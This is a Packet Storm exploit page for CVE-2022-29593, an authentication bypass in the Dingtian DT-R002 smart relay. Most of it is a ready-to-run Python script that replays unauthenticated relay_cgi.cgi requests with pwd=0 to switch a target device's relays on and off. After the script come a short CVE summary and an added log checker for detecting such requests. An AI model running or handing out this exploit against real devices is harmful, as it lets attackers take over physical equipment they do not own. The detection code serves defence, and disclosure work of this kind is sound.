Dingtian-DT-R002 3.1.276A Authentication Bypass

Dingtian-DT-R002 version 3.1.276A suffers from an authentication bypass vulnerability.

Packet Storm
# Exploit Title: Dingtian-DT-R002 3.1.276A - Authentication Bypass
# Google Dork: NA
# Date: 13th July 2022
# Exploit Author: Victor Hanna (Trustwave SpiderLabs)
# Author Github Page: https://9lyph.github.io/CVE-2022-29593/
# Vendor Homepage: https://www.dingtian-tech.com/en_us/relay4.html
# Software Link: https://www.dingtian-tech.com/en_us/support.html?tab=download
# Version: V3.1.276A
# Tested on: MAC OSX
# CVE : CVE-2022-29593

#!/usr/local/bin/python3
# Author: Victor Hanna (SpiderLabs)
# DingTian DT-R002 2CH Smart Relay
# CWE-294 - Authentication Bypass by Capture-replay

import requests
import re
import urllib.parse
from colorama import init
from colorama import Fore, Back, Style
import sys
import os
import time
from urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)


def banner():
    print ("[+]********************************************************************************[+]")
    print ("|   Author : Victor Hanna (9lyph)["+Fore.RED + "SpiderLabs" +Style.RESET_ALL+"]\t\t\t\t\t    |")
    print ("|   Description: DingTian DT-R002 2CH Smart Relay                                      |")
    print ("|   Usage : "+sys.argv[0]+" <host> <relay#>                                           |")
    print ("[+]********************************************************************************[+]")


def main():
    os.system('clear')
    banner()
    # Relay control requests as captured from the web UI. The firmware accepts
    # them with pwd=0 and no valid session, which is the CWE-294 replay issue.
    urlRelay1On  = "http://"+host+"/relay_cgi.cgi?type=0&relay=0&on=1&time=0&pwd=0&"
    urlRelay1Off = "http://"+host+"/relay_cgi.cgi?type=0&relay=0&on=0&time=0&pwd=0&"
    urlRelay2On  = "http://"+host+"/relay_cgi.cgi?type=0&relay=1&on=1&time=0&pwd=0&"
    urlRelay2Off = "http://"+host+"/relay_cgi.cgi?type=0&relay=1&on=0&time=0&pwd=0&"
    # Headers from the captured request (kept for reference; not passed to requests.get below).
    headers = {
        "Host": ""+host+"",
        "User-Agent": "9lyph/3.0",
        "Accept": "*/*",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate",
        "DNT": "1",
        "Connection": "close",
        "Referer": "http://"+host+"/relay_cgi.html",
        "Cookie": "session=4463009"
    }
    print (Fore.YELLOW + "[+] Exploiting" + Style.RESET_ALL, flush=True, end=" ")
    for i in range(5):
        time.sleep (1)
        print (Fore.YELLOW + "." + Style.RESET_ALL, flush=True, end="")
    try:
        # Toggle the selected relay on, wait five seconds, then toggle it off again.
        # A timeout is set so the Timeout handler below can actually fire.
        if (relay == "1"):
            print (Fore.GREEN + "\n[+] Relay 1 switched on !" + Style.RESET_ALL)
            r = requests.get(urlRelay1On, timeout=10)
            time.sleep (5)
            print (Fore.GREEN + "[+] Relay 1 switched off !" + Style.RESET_ALL)
            r = requests.get(urlRelay1Off, timeout=10)
            print (Fore.YELLOW + "PWNED !!!" + Style.RESET_ALL, flush=True, end="")
        elif (relay == "2"):
            print (Fore.GREEN + "\n[+] Relay 2 switched on !" + Style.RESET_ALL)
            r = requests.get(urlRelay2On, timeout=10)
            time.sleep (5)
            print (Fore.GREEN + "[+] Relay 2 switched off !" + Style.RESET_ALL)
            r = requests.get(urlRelay2Off, timeout=10)
            print (Fore.YELLOW + "PWNED !!!" + Style.RESET_ALL, flush=True, end="")
        else:
            print (Fore.RED + "[!] No such relay" + Style.RESET_ALL)
    except KeyboardInterrupt:
        sys.exit(1)
    except requests.exceptions.Timeout:
        print ("[!] Connection to host timed out !")
        sys.exit(1)
    except Exception as e:
        print (Fore.RED + "[+] You came up short I'm afraid !" + Style.RESET_ALL)


if __name__ == "__main__":
    if len(sys.argv) > 2:
        host = sys.argv[1]
        relay = sys.argv[2]
        main ()
    else:
        print (Fore.RED + "[+] Not enough arguments, please specify target and relay!" + Style.RESET_ALL)

Related news

CVE-2022-29593: Authentication Bypass by Capture Replay (Dingtian-DT-R002)

relay_cgi.cgi on Dingtian DT-R002 2CH relay devices with firmware 3.1.276A allows an attacker to replay HTTP post requests without the need for authentication or a valid signed/authorized request.
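As an added defender-side example, not part of the advisory or the exploit author's code: a small Python checker that parses access-log lines from a reverse proxy assumed to sit in front of the relay and flags relay_cgi.cgi control requests that carry pwd=0 or no pwd, i.e. the unauthenticated replayable commands described above. The log format, addresses and values are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (common log format) as a reverse proxy in front of the
# relay might record them; not taken from the advisory, all values are made up.
SAMPLE_LOG = """\
192.0.2.10 - - [13/Jul/2022:10:00:01 +0000] "GET /relay_cgi.cgi?type=0&relay=0&on=1&time=0&pwd=0& HTTP/1.1" 200 17
192.0.2.10 - - [13/Jul/2022:10:00:06 +0000] "GET /relay_cgi.cgi?type=0&relay=0&on=0&time=0&pwd=0& HTTP/1.1" 200 17
198.51.100.7 - - [13/Jul/2022:10:01:00 +0000] "GET /relay_cgi.html HTTP/1.1" 200 2048
198.51.100.7 - - [13/Jul/2022:10:01:05 +0000] "GET /relay_cgi.cgi?type=0&relay=1&on=1&time=0&pwd=8f3a21 HTTP/1.1" 200 17
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def parse_line(line):
    """Return the fields of one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_unauthenticated_relay_toggles(log_text, trusted_sources=frozenset()):
    """Flag relay_cgi.cgi requests carrying pwd=0 or no pwd at all: control
    commands the firmware accepts without a valid password or signed request.
    Requests from trusted_sources (e.g. the management host) are skipped."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["src"] in trusted_sources:
            continue
        url = urlsplit(rec["target"])
        if not url.path.endswith("/relay_cgi.cgi"):
            continue
        qs = parse_qs(url.query)          # trailing '&' is ignored by parse_qs
        if qs.get("pwd", [""])[0] in ("", "0"):
            hits.append({"src": rec["src"], "ts": rec["ts"],
                         "relay": qs.get("relay", ["?"])[0],
                         "on": qs.get("on", ["?"])[0], "status": rec["status"]})
    return hits

if __name__ == "__main__":
    for h in find_unauthenticated_relay_toggles(SAMPLE_LOG):
        print(f"{h['ts']} {h['src']} toggled relay {h['relay']} on={h['on']} (HTTP {h['status']})")
```

The device itself may not keep an access log, so the practical mitigation remains isolating the relay on a management network and fronting it with a proxy that both logs and enforces authentication.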
